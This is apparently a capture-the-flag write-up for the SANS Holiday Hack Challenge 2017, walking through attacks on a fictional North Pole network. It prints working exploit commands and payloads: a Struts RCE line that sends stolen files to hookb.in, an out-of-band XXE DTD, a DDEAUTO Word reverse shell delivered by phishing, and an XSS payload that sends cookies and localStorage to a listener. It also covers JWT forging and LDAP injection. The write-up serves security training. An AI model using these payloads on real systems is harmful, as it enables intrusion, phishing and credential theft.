SANS Holiday Hack Challenge 2017 Solution

  2018-01-01


Hacking the Northpolechristmastown

l2s.northpolechristmastown.com

Letters to Santa app contains a reference to a development system in a HTML comment section.

<!-- Development version -->
<a href="http://dev.northpolechristmastown.com" style="display: none;">Access Development Version</a>

Exploiting Apache Struts

The development interface is based on Apache struts. The utilized version is vulnerable to CVE 2017-9805. A respective script can be found on github.

The script can execute a user supplied command. For a little feedback, the response is uploaded to hookbin. A hint from Sparkle indicates, that the developer might have stored credentials in clear text. With a quick search they can be discovered in the source code of the letters to santa app.

$ python cve-2017-9805.py -u https://dev.northpolechristmastown.com/orders.xhtml -c 'echo "test=$(ls -larthR /home/alabaster_snowball | base64 -w0 - && echo "||" && find /opt -name "*.class" -type f -exec grep -i -C2 password {} \; | base64 -w0 - )" | curl -d @- https://hookb.in/Kb8BRDkw'
    final String host = "localhost";
    final String username = "alabaster_snowball";
    final String password = "stream_unhappy_buy_loss";
    String connectionURL = "jdbc:mysql://" + host + ":3306/db?user=;password=";
    Connection connection = null;
    Statement statement = null;

The credentials grants access to the SSH service.

Attacking the Network

After logging in via SSH we are placed in a restricted shell. Alongside some other tools the system has nmap available. With that we can scan the internal network for other hosts.

Host: 10.142.0.2 (hhc17-l2s-proxy.c.holidayhack2017.internal)   Ports: 22/open/tcp//ssh//OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)/, 80/open/tcp//http//nginx 1.10.3/, 443/open/tcp//ssl|http//nginx 1.10.3/, 2222/open/tcp//ssh//OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)/    Ignored State: closed (65531)
Host: 10.142.0.3 (hhc17-apache-struts1.c.holidayhack2017.internal)  Ports: 22/open/tcp//ssh//OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)/, 80/open/tcp//http//nginx 1.10.3/   Ignored State: closed (65533)
Host: 10.142.0.5 (mail.northpolechristmastown.com)  Ports: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)/, 25/open/tcp//smtp//Postfix smtpd/, 80/open/tcp//http//nginx 1.10.3 (Ubuntu)/, 143/open/tcp//imap//Dovecot imapd/, 2525/open/tcp//smtp//Postfix smtpd/, 3000/open/tcp//http//Node.js Express framework/  Ignored State: closed (65529)
Host: 10.142.0.6 (edb.northpolechristmastown.com)   Ports: 22/open/tcp//ssh//OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)/, 80/open/tcp//http//nginx 1.10.3/, 389/open/tcp//ldap?///, 8080/open/tcp//http//Werkzeug httpd 0.12.2 (Python 2.7.13)/  Ignored State: closed (65531)
Host: 10.142.0.7 (hhc17-smb-server.c.holidayhack2017.internal)  Ports: 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, 445/open/tcp//microsoft-ds//Microsoft Windows Server 2008 R2 - 2012 microsoft-ds/, 3389/open/tcp//ssl|ms-wbt-server?///, 5985/open/tcp//http//Microsoft HTTPAPI httpd 2.0 (SSDP|UPnP)/, 5986/open/tcp//ssl|http//Microsoft HTTPAPI httpd 2.0 (SSDP|UPnP)/, 49666/open/tcp//msrpc//Microsoft Windows RPC/, 49668/open/tcp//msrpc//Microsoft Windows RPC/  Ignored State: filtered (65527)
Host: 10.142.0.8 (hhc17-emi.c.holidayhack2017.internal) Ports: 80/open/tcp//http//Microsoft IIS httpd 10.0/, 3389/open/tcp//ssl|ms-wbt-server?///, 5985/open/tcp//http//Microsoft HTTPAPI httpd 2.0 (SSDP|UPnP)/, 5986/open/tcp//ssl|http//Microsoft HTTPAPI httpd 2.0 (SSDP|UPnP)/ Ignored State: filtered (65531)
Host: 10.142.0.11 (hhc17-apache-struts2.c.holidayhack2017.internal) Ports: 22/open/tcp//tcpwrapped///, 80/open/tcp//http//nginx 1.10.3/, 18281/open/tcp//tcpwrapped///, 44665/open/tcp///// Ignored State: closed (65531)
Host: 10.142.0.13 (eaas.northpolechristmastown.com) Ports: 80/open/tcp//http//Microsoft IIS httpd 10.0/, 3389/open/tcp//ssl|ms-wbt-server?///, 5985/open/tcp//http//Microsoft HTTPAPI httpd 2.0 (SSDP|UPnP)/, 5986/open/tcp//ssl|http//Microsoft HTTPAPI httpd 2.0 (SSDP|UPnP)/ Ignored State: filtered (65531)

10.142.0.7

The system has got a SMB service running on the internal network. In order to access that service a local port forwarding has to be created.

ssh alabaster_snowball@l2s.northpolechristmastown.com -L :445:10.142.0.7:445

With remote access to the SMB service enabled the usual tools of trade can be harnessed.

Connecting to the samba fileserver.
smbclient -L localhost -u alabaster_snowball

The server provides a file share with the name FileStor. The easiest way to access the shared drive is to directly mount it.

mount -t cifs -o username=alabaster_snowball,password=stream_unhappy_buy_loss //localhost/FileStor /mnt/foo 

Voila, Great Page 3 is present on the share, along with some other documents.

mail.northpolechristmastown.com

Pepper indicates in a hint that the Alabaster implemented his own encryption schema based on AES256. Implementing your own crypto is alwaysa bad idea. During the initial information gathering phase a cookie.txt file is referenced in the robots.txt file. The referenced file includes an excerpt of the implemented cookie mechanism.

//FOUND THESE FOR creating and validating cookies. Going to use this in node js
    function cookie_maker(username, callback){
        var key = 'need to put any length key in here';
        //randomly generates a string of 5 characters
        var plaintext = rando_string(5)
        //makes the string into cipher text .... in base64. When decoded this 21 bytes in total length. 16 bytes for IV and 5 byte of random characters
        //Removes equals from output so as not to mess up cookie. decrypt function can account for this without erroring out.
        var ciphertext = aes256.encrypt(key, plaintext).replace(/\=/g,'');
        //Setting the values of the cookie.
        var acookie = ['IOTECHWEBMAIL',JSON.stringify({"name":username, "plaintext":plaintext,  "ciphertext":ciphertext}), { maxAge: 86400000, httpOnly: true, encode: String }]
        return callback(acookie);
    };
    function cookie_checker(req, callback){
        try{
            var key = 'need to put any length key in here';
            //Retrieving the cookie from the request headers and parsing it as JSON
            var thecookie = JSON.parse(req.cookies.IOTECHWEBMAIL);
            //Retrieving the cipher text 
            var ciphertext = thecookie.ciphertext;
            //Retrievingin the username
            var username = thecookie.name
            //retrieving the plaintext
            var plaintext = aes256.decrypt(key, ciphertext);
            //If the plaintext and ciphertext are the same, then it means the data was encrypted with the same key
            if (plaintext === thecookie.plaintext) {
                return callback(true, username);
            } else {
                return callback(false, '');
            }
        } catch (e) {
            console.log(e);
            return callback(false, '');
        }
    };

The code makes use of aes256. This library creates a random IV during encryption. Furthermore, the key is hashed with SHA-256 before the encryption. Finally, the IV is prepended to the encrypted string. In a hint Pepper asks “What happens if the encrypted string is only 16 bytes long?”. The original nodejs library verifies that encrypted string is at least 17 bytes aes256:67. That might be a hint to gain access to the mail system.

In the particular example the decrypted string is verified against a user supplied plaintext. Let’s simply try the 16 bytes version.

>>> IV=b'0000000000000000'
>>> base64.b64encode(IV)

The resulting encoded string might be accepted by the application. Paste that into the request an see if it is working.

Testing the JWT token.
curl -i -s -k  -X $'GET' \
    -b $'EWA={\"name\":\"alabaster.snowball@northpolechristmastown.com\",\"plaintext\":\"\",\"ciphertext\":\"MDAwMDAwMDAwMDAwMDAwMA==\"}' \
    $'http://mail.northpolechristmastown.com/account.html'

That worked! With access to the mail account of alabaster we can take a look at his emails. In one message the Great Book Page 4 is referenced and can be downloaded from the system link.

The mail with a reference to the Great Book Page.

Accounts

With some manual research the following Accounts send or receive a mail at some point. They might be valuable in a later stage of the story.

alabaster.snowball@northpolechristmastown.com
support@northpolechristmastown.com
admin@northpolechristmastown.com
jessica.claus@northpolechristmastown.com
all@northpolechristmastown.com
mary.sugerplum@northpolechristmastown.com
sparkle.redberry@northpolechristmastown.com
pepper.minstix@northpolechristmastown.com
tarpin.mcjinglehauser@northpolechristmastown.com
wunorse.openslae@northpolechristmastown.com
minty.candycane@northpolechristmastown.com (HTML)
reindeer@northpolechristmastown.com

eaas.northpolechristmastown.com

Sugarplum indicates that the service processes user supplied XML files. Also, Sugarplum mentions an article on the SANS Pentesting blog covering XML External Entity Injection. This kind of attack allows reads of arbitrary files that can be exfiltrated with a corresponding DTD file (see Out-of-band XML External Entity (OOB-XXE)).

In order to exploit the vulnerability the DTD file has to be accessible from the target system. The easiest thing is to create the file on the l2s system that we already have shell access to and open up a webserver.

echo -e "<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?>\n<\x21ENTITY % stolendata SYSTEM \x22file:///c:/greatbook.txt\x22>\n<\x21ENTITY % inception \x22<\x21ENTITY \x26\x23x25; sendit SYSTEM \x27http://10.142.0.3:8123/?%stolendata;\x27>\x22>" | tee evil.dtd
nc -lnvp 8123

After preparing everything we can send the XML with the DTD reference to the target system in order to trigger the XXE injection.

curl -i -s -k  -X $'POST' \
    -H $'Host: eaas.northpolechristmastown.com' \
    -H $'Content-Type: multipart/form-data; boundary=---------------------------199407962719084731591387759358' \
    -H $'Content-Length: 424' -H $'Cookie: ASP.NET_SessionId=nns1453hywr1wkzrwqucc5fa' \
    --data-binary $'-----------------------------199407962719084731591387759358\x0d\x0aContent-Disposition: form-data; name=\"file\"; filename=\"evil.xml\"\x0d\x0aContent-Type: text/xml\x0d\x0a\x0d\x0a<?xml version=\"1.0\" encoding=\"utf-8\"?>\x0a<!DOCTYPE demo [\x0a     <!ELEMENT demo ANY >\x0a     <!ENTITY % extentity SYSTEM \"http://10.142.0.3:8123/evil.dtd\">\x0a     %extentity;\x0a     %inception;\x0a     %sendit;\x0a     ]\x0a>\x0d\x0a-----------------------------199407962719084731591387759358--\x0d\x0a' \
    $'http://eaas.northpolechristmastown.com/Home/DisplayXml'

After the request the target system loads the DTD file. As soon as the definition is processed the contents of the file defined in the dtd will be sent back to the target server as a GET request.

The DTD is loaded and the file contents is sent.

The file includes a reference to the next page of the Great Book.

emi.northpolechristmastown.com

The hints from Shinny indicate that the target can only be attacked via a client side attack. Looking through Alabaster’s mailbox points out that he is looking for a cookie recipe. He is probably looking for a mail with a text that includes “More recipies for gingerbread cookies”.

One mail on the mailserver mentions a document that is used to open the calculator for Wunorse. A corresponding file is present on the samba file share that was previously exploited. The Word document makes use of the DDEAUTO action to open the calculator. In order to exploit this the command line has to be adjusted. Luckily, another mail mentions that alabaster installed nc.exe on the machine. This simplifies the whole process quite a bit as we can probably open a reverse shell with netcat.

As Word was not available prepare the payload document another method was utilized. A Docx file is basically a zipped XML file that can be edited manually. In order to adjust the payload the following commands perform the job.

mkdir dde
cd dde/
unzip ../MEMO - Calculator Access for Wunorse.docx
DDEAUTO c:\\windows\\system32\\cmd.exe "/k nc -nv 10.142.0.3 8123 -e cmd.exe"
zip -r ../rezipped.docx *

After the the payload document is ready the last preparation step is to start a listener in order to receive the reverse shell. As soon as everything is ready upload the payload document and send the phishing mail out to poor alabaster.

curl -i -s -k  -X $'POST' \
    -H $'Host: mail.northpolechristmastown.com' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 575' -H $'Cookie: EWA={\"name\":\"jessica.claus@northpolechristmastown.com\",\"plaintext\":\"\",\"ciphertext\":\"MDAwMDAwMDAwMDAwMDAwMA==\"}' \
    -b $'EWA={\"name\":\"jessica.claus@northpolechristmastown.com\",\"plaintext\":\"\",\"ciphertext\":\"MDAwMDAwMDAwMDAwMDAwMA==\"}' \
    --data-binary $'from_email=jessica.claus%40northpolechristmastown.com&to_email=alabaster.snowball%40northpolechristmastown.com&subject_email=More+recipies+for+gingerbread+cookies&message_email=54686520626573742072656369706520666f722067696e676572627265616420636f6f6b696520796f752063616e206765742e2041545441434845442046494c4520444f574e4c4f414420484552453a20687474703a2f2f6d61696c2e6e6f727468706f6c656368726973746d6173746f776e2e636f6d2f6174746163686d656e74732f6273554b5548594c6c3054793730735a626d726539627457674e6c7641475748374d316f365263453375697252366f6b43465f5f72657a69707065642e646f63780a20' \
    $'http://mail.northpolechristmastown.com/api.js'

After a few moments the system should connect back to the listener.

The target system opens a reverse netcat shell to the attacking machine.

Download Book Page

The goal on the system is to download another page from the Great Book. One easy solution is to simply open webserver via python on the victim machine in the root directory.

C:\PROGRA~1\Python36\python.exe -m http.server 8124

The page is then available at the following URI.

http://10.142.0.8:8124/GreatBookPage7.pdf

Information Gathering

The system is an up to date Windows 10 virtual machine.

OS Name:                   Microsoft Windows Server 2016 Datacenter
OS Version:                10.0.14393 N/A Build 14393

Commands are probably executed via the following python script. The file cannot be opened by the current user.

C:\PROGRA~1\WindowsGrabber\alabaster_snowball.py

In the same directory also exists another file ‘execute.ps1’.

function exec {
    $the_file = '.\file.txt'
    foreach($line in Get-Content $the_file) {
        $job  = Start-Job -ScriptBlock {param($p) iex($p)} -Arg $line
    }
    Clear-Content $the_file
}

while ($true) {
    exec
    Start-Sleep -s 10
}

The reason for this file can only be speculated.

edb.northpolechristmastown.com

Information gathering shows that the elf database is based on Materialize CSS. The default credentials for alabaster do not grant access to the portal. In the source code the following JavaScript snippet provides some hints regarding the authorization.

token = localStorage.getItem("np-auth");
if (token) {
    user_json = JSON.parse(atob(token.split('.')[1]))

Here a token is stored in the localStorage. According to a hint from Wunorse the password reset might be vulnerable to a XSS vulnerability.

steal cookies and localStorage

Testing the password request shows that script tags are filtered. This confirms that Alabaster implemented some kind of security filter as Wunrose also indicated.

Steal Cookies and localStorage

After some tweaking, the following payload sends cookies and localStorage back to the attacker.

<img src=x onerror=this.src='http://10.142.0.3:8124/foo.png?cookie='+document.cookie+'&foo='+btoa(JSON.stringify(localStorage))>
The request in burp repeater.
curl -i -s -k  -X $'POST' \
    -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' \
    --data-binary $'uid=alabaster.snowball&email=alabaster.snowball%40northpolechristmastown.com&message=testasdf+%3Cimg+src%3Dx+onerror=this.src=\'http%3A%2F%2F10.142.0.11%3A8123%2Ffoo.png?cookie=\'%2bdocument.cookie%2b\'%26foo=\'%2bbtoa(JSON.stringify(localStorage))%2b\'%26bar=\'%3E' \
    $'http://edb.northpolechristmastown.com/service'

After a few moments the XSS is triggered by another user and the listening server receives a connection with the cookies and localStorage.

The cookies are sent back to the attacking machine.

The following values are sent back

SESSION=hxxer50N2e1C2AFt5X06
{"np-auth":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I"}

The SESSION cookie does not grant any access to the application. The np-auth token is formatted like a JWT token, separated by two dots. The first section describes the token signature format.

{"alg":"HS256","typ":"JWT"}

The middle part includes the base64 encoded payload for the token.

{"dept":"Engineering","ou":"elf","expires":"2017-08-16 12:00:47.248093+00:00","uid":"alabaster.snowball"}

The token is already expired and can therefore not be utilized to access the application. To gain access a valid token probably has to be forged.

Discover key for JWT Token

The JWT token is secured with an HMAC algorithm. The easiest option would be to replace the replace ‘HS256’ with ‘none’ in order to fool library. Unfortunately, that did not work. The next viable option is to test for password reuse or weak passwords. John the ripper supports JWT tokens and might be able to do the job. The following command tries all password lists from the SecLists.

for FILE in $(ls /opt/SecLists/Passwords/*.txt); do ~/Tools/JohnTheRipper/run/john --fork=4 --wordlist=${FILE} jwt.token; done
~/Tools/JohnTheRipper/run/john jwt.token --show=left

No wordlist did include a suitable secret for the hash. While looking for another option john can try and brute force the secret.

john jwt.token

After a few minutes that did actually yield the secret for the HMAC.

John the ripper cracked the secret with a simple brute-force attack.

With the secret key we can finally forge a valid JWT token. The following python snippet creates a token that grants access to the application.

import jwt
key='3lv3s'
encoded=jwt.encode({'dept': 'administrators',
 'expires': '2018-08-16 12:00:47.248093+00:00',
 'ou': 'human', 'uid': 'santa.claus'}, key, algorithm='HS256')

The resulting JWT token has to be written to the localStorage as np-auth. With the token in localStorage the application automatically logs the user in.

Successfully logged in with the new JWT token.

Santa’s Letter

Inside the application we are able to query the elf database. Access to a restricted area is only granted by providing a password In the initial stage an LDAP description file was discovered on the webserver. In this file the different fields for the objects are listed, including the userPassword.

#LDAP LDIF TEMPLATE

dn: dc=com
dc: com
objectClass: dcObject

dn: dc=northpolechristmastown,dc=com
dc: northpolechristmastown
objectClass: dcObject
objectClass: organization

dn: ou=human,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: human

dn: ou=elf,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: elf

dn: ou=reindeer,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: reindeer

dn: cn= ,ou= ,dc=northpolechristmastown,dc=com
objectClass: addressbookPerson
cn: 
sn: 
gn: 
profilePath: /path/to/users/profile/image
uid: 
ou: 
department: 
mail: 
telephoneNumber: 
street:
postOfficeBox: 
postalCode: 
postalAddress: 
st: 
l: 
c: 
facsimileTelephoneNumber: 
description: 
userPassword: 

The path is layed out, we have to dump the database.

Database Injection

Wunrose mentioned a recent article about injections in similar databases. SANS Pentest Blog has a recent article about LDAP injection. By manually adding the respective field name to the attributes in the POST query the password hash is returned by the server. The next step is to query all objects via LDAP Injection. After some tweaking the following request queries all the objects from the database.

The query returns all user objects together with their password hashes.
curl -i -s -k  -X $'POST' \
    -H $'Host: edb.northpolechristmastown.com' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'np-auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkZXB0IjoiYWRtaW5pc3RyYXRvcnMiLCJleHBpcmVzIjoiMjAxOC0wOC0xNiAxMjowMDo0Ny4yNDgwOTMrMDA6MDAiLCJvdSI6Imh1bWFuIiwidWlkIjoic2FudGEuY2xhdXMifQ.VNrdoutFDu4OwfPRXHVWL00r6Q-WJQG9qVoUznSSJ40' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 197' -H $'Cookie: SESSION=yN38l5ksth22we4cue7a' \
    -b $'SESSION=yN38l5ksth22we4cue7a' \
    --data-binary $'name=))(departmen=it)(|(cn=&isElf=True&attributes=profilePath%2Cgn%2Csn%2Cmail%2Cuid%2Cdepartment%2CtelephoneNumber%2Cdescription%2CuserPassword,street,postOfficeBox,postalCode,postalAddress,st,l,c' \
    $'http://edb.northpolechristmastown.com/search'

Unfortunately, the passwords are not in clear text but rather hashed. Release the cracker!

Cracking the Password Hashes

The passwords are hashed using unsalted md5. First of all, john the ripper is put to work. While john is working on the hashes, some hashes might already be listed on public hash lists.

for FILE in $(ls /opt/SecLists/Passwords/*.txt); do ~/Tools/JohnTheRipper/run/john --fork=4 --wordlist=${FILE} --format=Raw-MD5 userpass.txt; done
~/Tools/JohnTheRipper/run/john --format=Raw-MD5 userpass.txt --show=left

Of the twelve hashes only on is listed online, cdabeb96b508f25f97ab0f162eac5a04.

cdabeb96b508f25f97ab0f162eac5a04:1iwantacookie

During the writeup another hash for santa came back from edb.

d8b4c05a35b0513f302a85c409b4aab3:001cookielips001

This is the password for Santa’s account and grants access through the last door. The letter to Santa is behind the password request.

The hidden letter to santa.

Naughty and Nice List

Santa’s naughty and nice list can be downloaded from the samba share. The list includes the names and verdict for people. It does not include background information for the verdict. The north pole police department lists the background information on their website.

nppd.northpolechristmastown.com

In order to properly process the data the whole database has to be downloaded. The JSON database can be downlaoded directly from the command line.

curl -i -s -k  -X $'GET' \
    $'https://nppd.northpolechristmastown.com/infractions?query=severity>0&json=1'

With the background information at hand the next step is to combine the information. Python to the help.

Analysis

First of all, the nppd data is structured around the name. With this format the Naughty and Nice List can easily verified.

The first question is to figure out the number of infractions required to be called ‘Naughty’. With great thinking and counting can the number of infractions for each name on the naughty list this question is easily answered. The 4th infraction results in a ‘naughty’ verdict.

The next question is to find out the munchkin moles with the nppd data. According to a hint from Minty two munchkin moles got into a fight with “pulling hair, and throwing rocks […] a super atomic wedgie”. The intersection of the first two infractions yields a list of six names.

Questions

  1. Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball.

    1. What is the title of that page? About This Book (Page 1)
  2. Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com.

    1. What is the topic of The Great Book page available in the web root of the server? On The Topic of Flying Animals (Page 2)
    2. What is Alabaster Snowball’s password? stream_unhappy_buy_loss
  3. The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server.

    1. What is the file server share name? FileStor
  4. Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com.

    1. What can you learn from The Great Book page found in an e-mail on that server? Munchkin Moles infiltrated the elves.
  5. Naughty and Nice List

    1. How many infractions are required to be marked as naughty on Santa’s Naughty and Nice List? Four infractions are required
    2. What are the names of at least six insider threat moles? Nina Fitzgerald, Kirsty Evans, Isabel Mehta, Christy Srivastava, Sheri Lewis, Beverly Khalil
    3. Who is throwing the snowballs from the top of the North Pole Mountain? Abominable Snow Monster
    4. What is your proof? Chatlog
  6. The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions.

    1. What is the title of The Great Book page? The Abominable Snow Monster (Page 5)
  7. Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf.

    1. What does The Great Book page describe? Regarding the Witches of Oz - the witches of Oz remained neutral during the Great Schism.
  8. Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com.

    1. Who wrote the letter? The Wizard of Oz
    1. Which character is ultimately the villain causing the giant snowball problem. Glinda, the Good Witch
    2. What is the villain’s motive? All-out War between Oz and the North Pole.

Achievements

Terminal Challenges

Wunrose Openslae

                 .--._.--.--.__.--.--.__.--.--.__.--.--._.--.
               _(_      _Y_      _Y_      _Y_      _Y_      _)_
              [___]    [___]    [___]    [___]    [___]    [___]
              /:' \    /:' \    /:' \    /:' \    /:' \    /:' \
             |::   |  |::   |  |::   |  |::   |  |::   |  |::   |
             \::.  /  \::.  /  \::.  /  \::.  /  \::.  /  \::.  /
         jgs  \::./    \::./    \::./    \::./    \::./    \::./
               '='      '='      '='      '='      '='      '='
Wunorse Openslae has a special challenge for you.
Run the given binary, make it return 42.
Use the partial source for hints, it is just a clue.
You will need to write your own code, but only a line or two.
total 88
-rwxr-xr-x 1 root root 84824 Dec 16 16:59 isit42
-rw-r--r-- 1 root root   654 Dec 16 16:57 isit42.c.un
elf@444800d15214:~$ 
elf@444800d15214:~$ ./isit42 
Starting up ... done.
Calling rand() to select a random number.
653 is not 42.
elf@444800d15214:~$ cat isit42.c.un 
#include <stdio.h>
// DATA CORRUPTION ERROR
// MUCH OF THIS CODE HAS BEEN LOST
// FORTUNATELY, YOU DON'T NEED IT FOR THIS CHALLENGE
// MAKE THE isit42 BINARY RETURN 42
// YOU'LL NEED TO WRITE A SEPERATE C SOURCE TO WIN EVERY TIME
int getrand() {
    srand((unsigned int)time(NULL)); 
    printf("Calling rand() to select a random number.\n");
    // The prototype for rand is: int rand(void);
    return rand() % 4096; // returns a pseudo-random integer between 0 and 4096
}
int main() {
    sleep(3);
    int randnum = getrand();
    if (randnum == 42) {
        printf("Yay!\n");
    } else {
        printf("Boo!\n");
    }
    return randnum;
}

elf@947cdc075ec8:~/src$ gcc desrand.c -o desrand.so -DLINUX -ldl -shared -fPIC
elf@947cdc075ec8:~$ LD_PRELOAD=src/desrand.so isit42 
Starting up ... done.
Calling rand() to select a random number.
                 .-. 
                .;;\ ||           _______  __   __  _______    _______  __    _  _______  _     _  _______  ______ 
               /::::\|/          |       ||  | |  ||       |  |   _   ||  |  | ||       || | _ | ||       ||    _ |
              /::::'();          |_     _||  |_|  ||    ___|  |  |_|  ||   |_| ||  _____|| || || ||    ___||   | ||
            |\/`\:_/`\/|           |   |  |       ||   |___   |       ||       || |_____ |       ||   |___ |   |_||_ 
        ,__ |0_..().._0| __,       |   |  |       ||    ___|  |       ||  _    ||_____  ||       ||    ___||    __  |
         \,`////""""\\\\`,/        |   |  |   _   ||   |___   |   _   || | |   | _____| ||   _   ||   |___ |   |  | |
         | )//_ o  o _\\( |        |___|  |__| |__||_______|  |__| |__||_|  |__||_______||__| |__||_______||___|  |_|
          \/|(_) () (_)|\/ 
            \   '()'   /            ______    _______  _______  ___      ___      __   __    ___   _______ 
            _:.______.;_           |    _ |  |       ||   _   ||   |    |   |    |  | |  |  |   | |       |
          /| | /`\/`\ | |\         |   | ||  |    ___||  |_|  ||   |    |   |    |  |_|  |  |   | |  _____|
         / | | \_/\_/ | | \        |   |_||_ |   |___ |       ||   |    |   |    |       |  |   | | |_____ 
        /  |o`""""""""`o|  \       |    __  ||    ___||       ||   |___ |   |___ |_     _|  |   | |_____  |
       `.__/     ()     \__.'      |   |  | ||   |___ |   _   ||       ||       |  |   |    |   |  _____| |
       |  | ___      ___ |  |      |___|  |_||_______||__| |__||_______||_______|  |___|    |___| |_______|
       /  \|---|    |---|/  \ 
       |  (|42 | () | DA|)  |       _   ___  _______ 
       \  /;---'    '---;\  /      | | |   ||       |
        `` \ ___ /\ ___ / ``       | |_|   ||____   |
            `|  |  |  |`           |       | ____|  |
      jgs    |  |  |  |            |___    || ______| ___ 
       _._  |\|\/||\/|/|  _._          |   || |_____ |   |
      / .-\ |~~~~||~~~~| /-. \         |___||_______||___|
      | \__.'    ||    '.__/ |
       `---------''---------` 
Congratulations! You've won, and have successfully completed this challenge.

Sugarplum Mary

                       *
                      .~'
                     O'~..
                    ~'O'~..
                   ~'O'~..~'
                  O'~..~'O'~.
                 .~'O'~..~'O'~
                ..~'O'~..~'O'~.
               .~'O'~..~'O'~..~'
              O'~..~'O'~..~'O'~..
             ~'O'~..~'O'~..~'O'~..
            ~'O'~..~'O'~..~'O'~..~'
           O'~..~'O'~..~'O'~..~'O'~.
          .~'O'~..~'O'~..~'O'~..~'O'~
         ..~'O'~..~'O'~..~'O'~..~'O'~.
        .~'O'~..~'O'~..~'O'~..~'O'~..~'
       O'~..~'O'~..~'O'~..~'O'~..~'O'~..
      ~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..
     ~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'
    O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~.
   .~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~
  ..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~.
 .~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'
O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..
Sugarplum Mary is in a tizzy, we hope you can assist.
Christmas songs abound, with many likes in our midst.
The database is populated, ready for you to address.
Identify the song whose popularity is the best.
total 20684
-rw-r--r-- 1 root root 15982592 Nov 29 19:28 christmassongs.db
-rwxr-xr-x 1 root root  5197352 Dec  7 15:10 runtoanswer
elf@e3de726ef55e:~$ sqlite3 christmassongs.db 'select * from songs where id = (select songid f
rom likes group by songid order by sum(like) desc limit 1);'
392|Stairway to Heaven|Led Zeppelin|1971|"Stairway to Heaven" is a song by the English rock ba
nd Led Zeppelin, released in late 1971. It was composed by guitarist Jimmy Page and vocalist R
obert Plant for the band's untitled fourth studio album (often called Led Zeppelin IV). It is 
often referred to as one of the greatest rock songs of all time.
elf@e3de726ef55e:~$ ./runtoanswer 
Starting up, please wait......
Enter the name of the song with the most likes: Stairway to Heaven
That is the #1 Christmas song, congratulations!

Sparkle Redberry

                ___,@
               /  <
          ,_  /    \  _,
      ?    \`/______\`/
   ,_(_).  |; (e  e) ;|
    \___ \ \/\   7  /\/    _\8/_
        \/\   \'=='/      | /| /|
         \ \___)--(_______|//|//|
          \___  ()  _____/|/_|/_|
             /  ()  \    `----'
            /   ()   \
           '-.______.-'
   jgs   _    |_||_|    _
        (@____) || (____@)
         \______||______/
My name is Sparkle Redberry, and I need your help.
My server is atwist, and I fear I may yelp.
Help me kill the troublesome process gone awry.
I will return the favor with a gift before nigh.
Kill the "santaslittlehelperd" process to complete this challenge.
elf@3cef0de4aad2:~$ alias
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0
-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias grep='grep --color=auto'
alias kill='true'
alias killall='true'
alias l='ls -CF'
alias la='ls -A'
alias ll='ls -alF'
alias ls='ls --color=auto'
alias pkill='true'
alias skill='true'
elf@537a65d4518a:~$ alias kill=kill
elf@402db136554a:~$ ps auxf
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
elf          1  0.2  0.0  18028  2872 pts/0    Ss   12:57   0:00 /bin/bash /sbin/init
elf          8  0.0  0.0   4224   648 pts/0    S    12:57   0:00 /usr/bin/santaslittlehelperd
elf         11  0.4  0.0  13528  6364 pts/0    S    12:57   0:00 /sbin/kworker
elf         18  1.6  0.0  71468 26556 pts/0    S    12:57   0:00  \_ /sbin/kworker
elf         12  0.0  0.0  18248  3208 pts/0    S    12:57   0:00 /bin/bash
elf         41  0.0  0.0  34424  2940 pts/0    R+   12:57   0:00  \_ ps auxf
elf@402db136554a:~$ kill -9 8

Shinny Upatree

              \ /
            -->*<--
              /o\
             /_\_\
            /_/_0_\
           /_o_\_\_\
          /_/_/_/_/o\
